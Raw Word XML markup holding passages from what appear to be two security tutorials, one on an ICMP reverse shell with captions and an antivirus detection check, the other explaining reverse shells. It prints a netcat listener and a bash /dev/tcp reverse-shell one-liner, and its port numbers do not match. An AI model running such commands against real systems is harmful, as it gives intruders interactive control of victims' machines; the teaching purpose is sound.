          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EB40C38" wp14:editId="7C4580DB">
            <wp:extent cx="5283200" cy="3295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3200" cy="3295650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300AE61" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 11: Reverse shell on attacking machine over ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2EB386"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Using Wireshark, we can see the communication taking place between the attacker and victim machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA184A"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Initially the packet transmission contains no data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6672850E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="116D3A76" wp14:editId="26687FBC">
            <wp:extent cx="5943600" cy="2393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93950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52675070" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 12: No data in ICMP packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085B72C"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When the attacker machine receives a reverse connection from the victim machine, this how the data looks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0EEB3" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11F911FC" wp14:editId="1B33BD5A">
            <wp:extent cx="567690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6900" cy="1250950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E620917" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 13: Victim connected to attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72039CCE"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Sending a command from the attacker’s machine to the victim’s machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA388CB" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AF3E024" wp14:editId="68EA92A0">
            <wp:extent cx="5695950" cy="76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950" cy="768350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC39443" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 14: Command sent by attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B90E0"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Response received from the victim’s machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0591C69B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A080442" wp14:editId="7097FC50">
            <wp:extent cx="5600700"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1409700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="447CEAFF" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 15: Output of executed command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07500571"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Note that in the received response above, the output of the command is not complete and the data size is 128 bytes. This is because we had set the data buffer size (max_buffer_size) as 128 bytes in source code. The remaining of the output is set in further sets of 128 bytes ’til it is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ED7A7F"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Last but not the least is checking the antivirus detection score:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688127AF"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noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11B78CF0" wp14:editId="49A6A10A">
            <wp:extent cx="5480050" cy="15303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0050" cy="1530350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC64B4" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 16: VirusTotal scan result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B101818"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t>Most probably the detection ratio hit 2 because of UPX packing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43792E3B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ICMP Shell is a really good development by Nico Leidecker, and someday, after some more work, it may also become part of the popular Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1453D" w14:textId="187CCBE9" w:rsidR="00195AE6" w:rsidRDefault="00195AE6"/>
    <w:p w14:paraId="6655B43F" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Not quite but, you aren’t alone in ignorance. It is surprising that the number of folks that don’t actually know what a reverse shell is. Long story short, it is when one computer connects to another computer but the initiating computer forwards their shell to the destination. It is commonplace that a reverse shell happens during an attack or as part of a pentest. They are scary attacks because it gives an attacker an interactive shell on a machine that they should not have had access to inside of the “hardened” area.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0B16D" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Lets break down how this works. </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>First there is a machine listening somewhere on a specific tcp port. In this case using netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD36297" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t xml:space="preserve">$ nc -vlp 80 </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-v, — verbose Set verbosity level (can be used several times); </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-l, — listen Bind and listen for incoming connections; </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-p, — source-port port Specify source port to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>http://man7.org/linux/man-pages/man1/ncat.1.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4479F2FA" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Simple enough, just a listener on a specific port. Second, we will need another machine, the victim, to connect to this machine and then forward the session to it. There are countless ways to setup this connection depending what resources are available. This is how to do it with bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B4809" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>$ bash -i &gt;&amp; /dev/tcp/192.168.1.142/80 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB74FF2" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>The command </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>bash -i &gt;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> invokes bash with an “interactive” option. Then </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>/dev/tcp/192.168.1.142/7023</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> redirects that session to a tcp socket via device file. </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>Finally </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>0&gt;&amp;1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Takes standard output, and connects it to standard input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4682C61D" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
